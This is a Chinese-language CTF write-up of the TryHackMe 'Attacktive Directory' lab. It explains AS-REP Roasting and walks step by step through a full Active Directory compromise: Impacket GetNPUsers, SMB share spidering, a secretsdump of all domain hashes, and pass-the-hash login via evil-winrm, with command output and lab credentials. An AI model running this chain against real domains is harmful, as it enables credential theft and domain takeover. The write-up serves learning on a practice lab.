AS_REP Roasting初探

前置知识

此为我第一次接触域渗透，在此之前也通过HTB的俩个靶机进行了了解。我觉得挺有意思的，关于本次AS_REP Roasting 的攻击原理也非常简单。

先决条件

要想利用 AS-REP Roasting ，首先需要 Kerberos 禁用了 预身份验证 。

并且我们已经获取到了域内可与KDC通信的一台主机或用户

原理

由于Kerberos默认开启 预身份验证，当客户端请求密钥分发中心(KDC) 颁发 TGT（Ticket Granting Ticket）时，客户端在请求TGT的同时，会发送 Pre-Authentication 数据，该数据包含加密时间戳，此时间戳用于AS服务器使用该用户hash进行解密来确定身份是否有误。如果验证无误，则通过AS_REQ返回TGT票据以及会话密钥，会话密钥能够通过hash爆破得到该用户密码。

那么假设关闭预身份验证 (即DONT_REQ_PREAUTH)，客户端发送AS_REQ请求之后，不存在加密时间戳，也就不用进行身份验证，直接返回AS_REP响应，TGT票据以及会话密钥，如此就可以爆破该用户密码。

靶机

此次的靶机是 THM-Attacktive Directory

┌──(root㉿vbox)-[/tmp]
└─# nmap -Pn -n --min-rate=10000 -sCV -p- $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-01 15:25 CST
Warning: 10.10.170.234 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.170.234
Host is up (0.54s latency).
Not shown: 51913 closed tcp ports (reset), 13601 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 07:25:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-06-01T07:26:55+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2025-05-31T07:24:38
|_Not valid after:  2025-11-30T07:24:38
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-06-01T07:26:46+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-01T07:26:47
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.90 seconds

端口扫描发现 139/445，使用kerbrute来枚举一下用户。

当前获取到的信息

ip：10.10.170.234

domain-name: spookysec.local

枚举域内用户

存在用户svc-admin

但目前我们暂不知晓该用户的密码，尝试使用AS_REP Roasting进行攻击。

AS_REP Roasting 获取用户hash。

当前获取到的信息

ip：10.10.170.234

domain-name: spookysec.local

Domain-User：svc-admin

使用impacket中的GetNPUsers.py进行攻击。

┌──(root㉿vbox)-[/tmp]
└─# python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:c9dc5df9d949949f23a6839236c366b8$99de4225b8456a330c86e8cbb76498bc4e628a46cef1a0643445d735040611cb6589484fddb783990165d94b9b6d1cd69f5b029f4f5d56732a0a7f7952bc30abf1ec868434f27e5eb3ce8b6111eedbf6c3e66a2e237080e58ab806f73339069b92a3a8c9f7f4c4ef225f0db24cb6df212df6307507bd8e928e9599d96e9878b17607e47cbc467717be9504dacbd73b2e7cac8ba717c2bfa36922c607386fb3523e9ade1903c8b8357a29a30dca002ab8002b0b241e0ef64437ec2da353b026d048da84a3d6dc9b55e3f3b0d854ceda7841018e485f3653b1669eac8b94924f317d0b757f8739d4581f458b1403c9eef09a8e

获取到hash，使用hashcat进行爆破。

可以用这个密码使用bloodyAD 来查看这个用户是否真的没有开启预身份验证。

bloodyAD --host $ip -d spookysec.local -u svc-admin -p management2005 get object 'svc-admin'

在userAccountControl 属性中，确有DONT_REQ_PREAUTH ，证明确实未开启预身份验证，正因如此，我们才能够获取到用户hash。

smb共享目录获取backup用户信息。

ip：10.10.170.234

domain-name: spookysec.local

Domain-User：svc-admin

Domain-User-svc-admin-Pass：management2005

现在我们已经拥有一个域用户的凭证，可以尝试枚举smb的共享目录，有哪些我们可以操控的。

┌──(root㉿vbox)-[/tmp]
└─# netexec smb $ip -u svc-admin -p management2005 --shares
SMB         10.10.170.234   445    ATTACKTIVEDIREC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB         10.10.170.234   445    ATTACKTIVEDIREC  [+] spookysec.local\svc-admin:management2005 
SMB         10.10.170.234   445    ATTACKTIVEDIREC  [*] Enumerated shares
SMB         10.10.170.234   445    ATTACKTIVEDIREC  Share           Permissions     Remark
SMB         10.10.170.234   445    ATTACKTIVEDIREC  -----           -----------     ------
SMB         10.10.170.234   445    ATTACKTIVEDIREC  ADMIN$                          Remote Admin
SMB         10.10.170.234   445    ATTACKTIVEDIREC  backup          READ            
SMB         10.10.170.234   445    ATTACKTIVEDIREC  C$                              Default share
SMB         10.10.170.234   445    ATTACKTIVEDIREC  IPC$            READ            Remote IPC
SMB         10.10.170.234   445    ATTACKTIVEDIREC  NETLOGON        READ            Logon server share 
SMB         10.10.170.234   445    ATTACKTIVEDIREC  SYSVOL          READ            Logon server share

可以看到有4个目录可读，我们使用模块spider-plus get下所有可读文件。

┌──(root㉿vbox)-[/tmp]
└─# netexec smb $ip -u svc-admin -p management2005 -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=10000
SMB         10.10.170.234   445    ATTACKTIVEDIREC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB         10.10.170.234   445    ATTACKTIVEDIREC  [+] spookysec.local\svc-admin:management2005 
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*]  MAX_FILE_SIZE: 9.77 KB
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.10.170.234   445    ATTACKTIVEDIREC  [*] Enumerated shares
SMB         10.10.170.234   445    ATTACKTIVEDIREC  Share           Permissions     Remark
SMB         10.10.170.234   445    ATTACKTIVEDIREC  -----           -----------     ------
SMB         10.10.170.234   445    ATTACKTIVEDIREC  ADMIN$                          Remote Admin
SMB         10.10.170.234   445    ATTACKTIVEDIREC  backup          READ            
SMB         10.10.170.234   445    ATTACKTIVEDIREC  C$                              Default share
SMB         10.10.170.234   445    ATTACKTIVEDIREC  IPC$            READ            Remote IPC
SMB         10.10.170.234   445    ATTACKTIVEDIREC  NETLOGON        READ            Logon server share 
SMB         10.10.170.234   445    ATTACKTIVEDIREC  SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.10.170.234.json".
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] SMB Shares:           6 (ADMIN$, backup, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] SMB Readable Shares:  4 (backup, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] Total folders found:  25
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] Total files found:    6
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] File size average:    1.44 KB
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] File size min:        22 B
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] File size max:        4.07 KB
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] File unique exts:     4 (ini, txt, pol, inf)
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] Downloads successful: 1
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] Unmodified files:     5
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [*] Updated files:        1
SPIDER_PLUS 10.10.170.234   445    ATTACKTIVEDIREC  [+] All files processed successfully.

backup@spookysec.local:backup2517860

获取到一个新用户的凭证。

根据题目所说backup用户属于域控制器的备份用户。

通过secretsdump获取所有用户的hash

ip：10.10.170.234

domain-name: spookysec.local

Domain-User：svc-admin,backup

Domain-User-svc-admin-Pass：management2005

Domain-User-backup-Pass : backup2517860

┌──(root㉿vbox)-[/tmp]
└─# python3 /opt/impacket/examples/secretsdump.py -dc-ip $ip -target-ip $ip backup@spookysec.local 
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:17960b8793202667f0c3d990b754297f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:868008ebcd155cdfdb430fbb2558a4d6879baf00e3f63682acd3c170dac61171
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:2a3f24b7c074c7b9892e9f228fba9bc5
ATTACKTIVEDIREC$:des-cbc-md5:4a2c315e9419b34f
[*] Cleaning up... 

获取hash，登录winrm

┌──(root㉿vbox)-[/tmp]
└─# evil-winrm -i $ip -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}